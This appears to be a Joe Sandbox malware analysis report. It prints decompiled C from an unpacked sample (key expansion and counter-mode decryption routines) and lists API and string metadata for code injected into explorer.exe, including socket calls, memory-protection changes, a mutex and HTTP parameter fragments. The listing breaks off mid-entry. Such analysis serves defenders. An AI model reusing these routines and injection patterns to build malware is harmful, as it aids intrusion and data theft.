                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • Opcode ID: 7717ebe5cfed9669cefb85dc77c12bd925c4c774b7d09bd006a24f89b0f777f6
                            • Instruction ID: 8ddf5703f84a5c5dad72106904d53c5ca36b555ff09368368e3b4db16bb0fba9
                            • Opcode Fuzzy Hash: 7717ebe5cfed9669cefb85dc77c12bd925c4c774b7d09bd006a24f89b0f777f6
                            • Instruction Fuzzy Hash: 5181203284C395DFDB16DF78E8967423F72E746720B0902CDD8A25B2D2D33125AACB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E00382D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                            				signed int _t66;
                            				signed int* _t69;
                            				signed int* _t81;
                            				signed int _t94;
                            				signed int _t96;
                            				signed int _t106;
                            				signed int _t108;
                            				signed int* _t110;
                            				signed int _t127;
                            				signed int _t129;
                            				signed int _t133;
                            				signed int _t152;
                            				intOrPtr _t171;
                            
                            				_t81 = _a12;
                            				_t110 = _a8;
                            				asm("ror esi, 0x8");
                            				asm("rol eax, 0x8");
                            				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                            				_t66 =  &(_t110[1]);
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                            				asm("ror edi, 0x8");
                            				asm("rol esi, 0x8");
                            				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                            				asm("ror esi, 0x8");
                            				asm("rol ecx, 0x8");
                            				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                            				if(_a16 != 0x100) {
                            					L4:
                            					return _t66 | 0xffffffff;
                            				} else {
                            					_t171 = _a4;
                            					_t69 = 0;
                            					_a12 = 0;
                            					while(1) {
                            						_t152 =  *(_t66 + 0x18);
                            						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                            						_t127 =  *_t66 ^ _t94;
                            						 *(_t66 + 0x1c) = _t94;
                            						_t96 =  *(_t66 + 4) ^ _t127;
                            						 *(_t66 + 0x20) = _t127;
                            						_t129 =  *(_t66 + 8) ^ _t96;
                            						 *(_t66 + 0x24) = _t96;
                            						 *(_t66 + 0x28) = _t129;
                            						if(_t69 == 6) {
                            							break;
                            						}
                            						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                            						_t133 =  *(_t66 + 0x10) ^ _t106;
                            						 *(_t66 + 0x2c) = _t106;
                            						_t108 =  *(_t66 + 0x14) ^ _t133;
                            						 *(_t66 + 0x34) = _t108;
                            						_t69 =  &(_a12[0]);
                            						 *(_t66 + 0x30) = _t133;
                            						 *(_t66 + 0x38) = _t108 ^ _t152;
                            						_t66 = _t66 + 0x20;
                            						_a12 = _t69;
                            						if(_t69 < 7) {
                            							continue;
                            						} else {
                            							goto L4;
                            						}
                            						goto L6;
                            					}
                            					return 0xe;
                            				}
                            				L6:
                            			}
















                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                            • Instruction ID: 277c9f3d2baf532d143830005d3dafc7b7cca68b7b775bbf1e8ebe98425e504e
                            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                            • Instruction Fuzzy Hash: 725161B3E14A214BD3188E09CC40636B792FFD8312B5F81BADD199B357CE74E9529A90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E003812FB(void* __ecx, intOrPtr* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, signed int* _a12, unsigned int _a16, unsigned int _a20) {
                            				intOrPtr _v8;
                            				signed int _v9;
                            				signed int _v10;
                            				signed int _v11;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				char _v40;
                            				unsigned int _t45;
                            				signed int* _t60;
                            				void* _t62;
                            				signed int* _t65;
                            				void* _t67;
                            				signed char _t70;
                            				signed int* _t84;
                            				signed int* _t92;
                            				void* _t98;
                            				signed int* _t100;
                            				void* _t102;
                            				void* _t104;
                            				void* _t105;
                            
                            				asm("loope 0xffffffcf");
                            				_t102 = _t104;
                            				_t45 = _a16;
                            				_t65 = _a12;
                            				_t105 = _t104 - 0x24;
                            				_t60 = _a20;
                            				_t92 = _t65;
                            				if(_t45 != 0) {
                            					_v24 =  *__edx;
                            					_v20 =  *((intOrPtr*)(__edx + 4));
                            					_t45 = _t45 >> 4;
                            					_v16 =  *((intOrPtr*)(__edx + 8));
                            					_v12 =  *(__edx + 0xc);
                            					if(_t45 != 0) {
                            						_t84 = _t60;
                            						_t100 =  &(_t84[3]);
                            						_v8 = _t65 - _t84;
                            						_a20 = _t45;
                            						do {
                            							E00383610(_a4, _a8,  &_v24, _t60);
                            							 *_t60 =  *_t60 ^  *_t92;
                            							 *(_t100 - 8) =  *(_t100 - 8) ^ _t92[1];
                            							 *(_t100 - 4) =  *(_t100 - 4) ^ _t92[2];
                            							 *_t100 =  *_t100 ^  *(_v8 + _t100);
                            							_t45 = ((((_v12 & 0x000000ff) << 0x00000008 | _v11 & 0x000000ff) << 0x00000008 | _v10 & 0x000000ff) << 0x00000008 | _v9 & 0x000000ff) + 1;
                            							_v12 = _t45 >> 0x18;
                            							_t105 = _t105 + 0x10;
                            							_t92 =  &(_t92[4]);
                            							_t60 =  &(_t60[4]);
                            							_t100 =  &(_t100[4]);
                            							_t31 =  &_a20;
                            							 *_t31 = _a20 - 1;
                            							_v11 = _t45 >> 0x10;
                            							_v10 = _t45 >> 8;
                            							_v9 = _t45;
                            						} while ( *_t31 != 0);
                            						_t65 = _a12;
                            					}
                            					_t67 = _t65 - _t92 + _a16;
                            					_t98 = _t67;
                            					if(_t67 != 0) {
                            						E00383610(_a4, _a8,  &_v24,  &_v40);
                            						_t45 = 0;
                            						if(_t98 != 0) {
                            							_t62 = _t60 - _t92;
                            							do {
                            								_t70 =  *(_t102 + _t45 - 0x24) ^  *_t92;
                            								_t45 = _t45 + 1;
                            								 *(_t62 + _t92) = _t70;
                            								_t92 =  &(_t92[0]);
                            							} while (_t45 < _t98);
                            						}
                            					}
                            				}
                            				return _t45;
                            			}


























                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1cd6ad57f16a8555599adf732742bcacab50b55884b1f22ac3cdbc3e767d5f16
                            • Instruction ID: a6382dc6f3293887d7d98321ce582631d4a65bb4c85b717b163e7060061e1f0c
                            • Opcode Fuzzy Hash: 1cd6ad57f16a8555599adf732742bcacab50b55884b1f22ac3cdbc3e767d5f16
                            • Instruction Fuzzy Hash: 2851A475A0025AAFCB05DF6DD4818AEFBF5FF88300B15C6A9E855A7301D270EA51CBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00381030(signed char* __eax) {
                            				signed char* _t37;
                            				unsigned int _t65;
                            				unsigned int _t73;
                            				unsigned int _t81;
                            				unsigned int _t88;
                            				signed char _t94;
                            				signed char _t97;
                            				signed char _t100;
                            
                            				_t37 = __eax;
                            				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
                            				_t94 = __eax[0xb];
                            				if((_t94 & 0x00000001) != 0) {
                            					_t65 = _t65 | 0x80000000;
                            				}
                            				_t37[0xc] = _t65 >> 0x18;
                            				_t37[0xf] = _t65;
                            				_t37[0xd] = _t65 >> 0x10;
                            				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
                            				_t97 = _t37[7];
                            				_t37[0xe] = _t65 >> 8;
                            				if((_t97 & 0x00000001) != 0) {
                            					_t73 = _t73 | 0x80000000;
                            				}
                            				_t37[8] = _t73 >> 0x18;
                            				_t37[0xb] = _t73;
                            				_t37[9] = _t73 >> 0x10;
                            				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
                            				_t100 = _t37[3];
                            				_t37[0xa] = _t73 >> 8;
                            				if((_t100 & 0x00000001) != 0) {
                            					_t81 = _t81 | 0x80000000;
                            				}
                            				_t37[4] = _t81 >> 0x18;
                            				_t37[7] = _t81;
                            				_t37[5] = _t81 >> 0x10;
                            				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t37[2] & 0x000000ff) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
                            				 *_t37 = _t88 >> 0x18;
                            				_t37[1] = _t88 >> 0x10;
                            				_t37[6] = _t81 >> 8;
                            				_t37[2] = _t88 >> 8;
                            				_t37[3] = _t88;
                            				return _t37;
                            			}












                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                            • Instruction ID: a7aedac624926f36c2a61e20a2a389e73cb78a07ec480bc60e767de8c76b34ac
                            • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                            • Instruction Fuzzy Hash: B7318F516587F10ED30E836D08BDA75AEC18E9720174EC2EEDADA6F2F3C0888408D3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E0039C3D8(signed int* __eax, signed int __ecx, intOrPtr _a4) {
                            				intOrPtr _t12;
                            				unsigned int _t23;
                            				intOrPtr _t25;
                            				void* _t28;
                            				intOrPtr _t33;
                            
                            				_t23 = __ecx & __eax[0xb];
                            				if( *__eax * 0x56 != 0) {
                            					asm("adc eax, 0x7ffe001c");
                            					do {
                            					} while (__eax != _t28);
                            					return (_t23 << 0x00000012 ^ _t23 >> 0x00000007) & 0x0007ffff ^ _t23 << 0x00000012 ^ _t23 >> 0x0000000d ^ 0x0618d8cb;
                            				} else {
                            					_t12 =  *0x7ffe0018;
                            					_t33 =  *0x7ffe0014;
                            					_t25 =  *0x7ffe001c;
                            					do {
                            					} while (_t12 != _t25);
                            					return (_t33 + _a4 << 0x00000012 ^ _t33 + _a4 >> 0x00000007) & 0x0007ffff ^ _t33 + _a4 << 0x00000012 ^ _t26 >> 0x0000000d ^ 0x0618d8cb;
                            				}
                            			}









                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fc80d08a39918c4ed8aeb2866cd1023b7fb2be4dddb15263f5103115e3a7b4bb
                            • Instruction ID: d410396b1561baf5d941e9f7224e9dc7148de5647b20c30040d8c727daeb0296
                            • Opcode Fuzzy Hash: fc80d08a39918c4ed8aeb2866cd1023b7fb2be4dddb15263f5103115e3a7b4bb
                            • Instruction Fuzzy Hash: 97F02B3B7205068B4BDCD519CC819273383E7C53043B8DA3CD926EB3A9C938EA12D654
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:2.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:4.6%
                            Total number of Nodes:458
                            Total number of Limit Nodes:18

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: getaddrinforecvsetsockopt
                            • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                            • API String ID: 1564272048-1117930895
                            • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                            • Instruction ID: 69cde7d31a9c45189edf3d3ac36846da7a9a9f3dc51fcf40903228a3ccd5e79f
                            • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                            • Instruction Fuzzy Hash: 73529570614A088FDB69EF68C4887EAB7E1FB94304F504A2DD59FD7242EE30B565CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID: `
                            • API String ID: 823142352-2679148245
                            • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                            • Instruction ID: c2406d328c1061124433baf6bd9aa05299a9d18a5d280840a03483bcf8be8a30
                            • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                            • Instruction Fuzzy Hash: 49225C70A18A099FCB59EF68C4986AEF7E1FB98305F41072ED45ED7250DB30E461CB86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 453 47a9e12-47a9e6e call 47a8942 NtProtectVirtualMemory 456 47a9e7d-47a9e8f 453->456 457 47a9e70-47a9e7c 453->457
                            APIs
                            • NtProtectVirtualMemory.NTDLL ref: 047A9E67
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                            • Instruction ID: 77d88286a13db602683b48c92bf32d736ddf3417bd0725409c01801a0b13bfc9
                            • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                            • Instruction Fuzzy Hash: 9A019E34628B484F9B88EF6C948412AB7E4FBC9214F000B3EA99AC3250EB60D5414B42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 458 47a9e0a-47a9e38 459 47a9e45-47a9e6e NtProtectVirtualMemory 458->459 460 47a9e40 call 47a8942 458->460 461 47a9e7d-47a9e8f 459->461 462 47a9e70-47a9e7c 459->462 460->459
                            APIs
                            • NtProtectVirtualMemory.NTDLL ref: 047A9E67
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                            • Instruction ID: 43d7ac1725406d19bf9dff984642bb01dfc6c636b608808bd0cf1a84bbbf05a3
                            • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                            • Instruction Fuzzy Hash: 5C01A274628B884F8B48EF7C94452A6B3E5FBCE314F000B3EE99AC3241DB21D5024B82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • ObtainUserAgentString.URLMON ref: 047A39A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: AgentObtainStringUser
                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                            • API String ID: 2681117516-319646191
                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                            • Instruction ID: eef592755960e1be52919332190e370732116d7739f69e0371a3674618f97549
                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                            • Instruction Fuzzy Hash: 0A31D171614A0C8FDB04EFA8C8887EEB7E0FB98208F40022AD54ED7340EF749655C78A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • ObtainUserAgentString.URLMON ref: 047A39A0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: AgentObtainStringUser
                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                            • API String ID: 2681117516-319646191
                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                            • Instruction ID: a07ca4b72f33462b789102a1dd2ec2b780a71a156b8ef31ec62f640bfbf4b8cd
                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                            • Instruction Fuzzy Hash: C121C370610A0C8FDB05EFA8C8487EEBBA4FF98208F40432AD55AD7340DF749655C78A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 232 479fb66-479fb68 233 479fb6a-479fb71 232->233 234 479fb93-479fbb8 232->234 236 479fbbb-479fc22 call 47a6612 call 47a8942 * 2 233->236 237 479fb73-479fb92 233->237 234->236 244 479fc28-479fc2b 236->244 245 479fcdc 236->245 237->234 244->245 247 479fc31-479fcd3 call 47aada4 call 47aa022 call 47aa3e2 call 47aa022 call 47aa3e2 CreateMutexW 244->247 246 479fcde-479fcf6 245->246 247->245 261 479fcd5-479fcda 247->261 261->246
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: CreateMutex
                            • String ID: .dll$el32$kern
                            • API String ID: 1964310414-1222553051
                            • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                            • Instruction ID: ac60ee6bac669d66906645b9a0757fc888f03c1cc215e9cffbd32410cacf5de1
                            • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                            • Instruction Fuzzy Hash: 1A416C70918A088FDF54EFA8C8987AD77E0FB98305F04467AD84ADB255EE30A945CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: CreateMutex
                            • String ID: .dll$el32$kern
                            • API String ID: 1964310414-1222553051
                            • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                            • Instruction ID: c1aa0685fa96da16aae854a29c7d3fafba56d7a1085eeb8caca9d2efc6dd9353
                            • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                            • Instruction Fuzzy Hash: 0A412B70918A088FDF94EFA8C4987AD77F0FBA8305F04427AC84EDB255DE34A955CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 289 47a572e-47a5768 290 47a576a-47a5782 call 47a8942 289->290 291 47a5788-47a57ab connect 289->291 290->291
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: connect
                            • String ID: conn$ect
                            • API String ID: 1959786783-716201944
                            • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                            • Instruction ID: 59cc1f85229a354647b17c252f76e16d44f31bad6a69c91e32c6c8075f525546
                            • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                            • Instruction Fuzzy Hash: 43015E30618B188FCB84EF5CE088B55B7E0FB98314F1546AED90DCB226C674D8818BC2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 294 47a5732-47a5768 295 47a576a-47a5782 call 47a8942 294->295 296 47a5788-47a57ab connect 294->296 295->296
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: connect
                            • String ID: conn$ect
                            • API String ID: 1959786783-716201944
                            • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                            • Instruction ID: 26b349985e643b07e4daff3c6232cf7170a063ba609e80ed5e0d10f25bea0913
                            • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                            • Instruction Fuzzy Hash: 4C014470618A1C8FCB84EF5CE048B5577E0FB59315F1545AED80DCB226C774D9818BC2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 299 47a562c-47a566b 300 47a568b-47a56a6 WSAStartup 299->300 301 47a566d-47a5685 call 47a8942 299->301 301->300
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: Startup
                            • String ID: WSAS$tart
                            • API String ID: 724789610-2426239465
                            • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                            • Instruction ID: 29b822924bb556e0f15ef8472a521535d2339bb979e6cb05f6a7e098cf0b8e5c
                            • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                            • Instruction Fuzzy Hash: AB018B30518A188FCB44DF1CD04CB69BBE0FB58351F2502A9D409CB266C7B0C9428B96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 304 47a5632-47a566b 305 47a568b-47a56a6 WSAStartup 304->305 306 47a566d-47a5685 call 47a8942 304->306 306->305
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: Startup
                            • String ID: WSAS$tart
                            • API String ID: 724789610-2426239465
                            • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                            • Instruction ID: c8b5aae7289ee53daa5fb1e9eda9508db4a3c6a5567751665a26bb26b6288390
                            • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                            • Instruction Fuzzy Hash: 70014B70518A188FCB44EF1C904CB69BBE0FB58351F2542A9E40DCB266C7B0C9418B96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 417 47a56b2-47a56e5 418 47a56e7-47a56ff call 47a8942 417->418 419 47a5705-47a572d send 417->419 418->419
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.514186613.0000000004790000.00000040.80000000.00040000.00000000.sdmp, Offset: 04790000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_4790000_explorer.jbxd
                            Similarity
                            • API ID: send
                            • String ID: send
                            • API String ID: 2809346765-2809346765
                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                            • Instruction ID: 536e68f4545f91d2c40898458fa6d169863e375295996af204aac9457dc5ece2
                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                            • Instruction Fuzzy Hash: B3011270518A188FDB84EF5CD448B2577E0EB98314F1646AED85DCB366C670D8818B86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 422 47a55b2-47a55ea 423 47a560a-47a562b socket 422->423 424 47a55ec-47a5604 call 47a8942 422->424 424->423
                            APIs
                            Strings
                            Memory Dump Source
